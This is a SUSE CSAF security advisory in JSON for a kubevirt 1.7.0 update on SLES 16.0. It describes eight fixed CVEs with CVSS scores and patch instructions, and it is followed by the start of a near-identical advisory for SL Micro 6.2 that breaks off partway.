CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20610-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20610-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620610-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20610-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024607.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20610-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2026:20551-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
SUSE-SL-Micro-6.2-319
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20551-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20551-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620551-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20551-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/044565.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
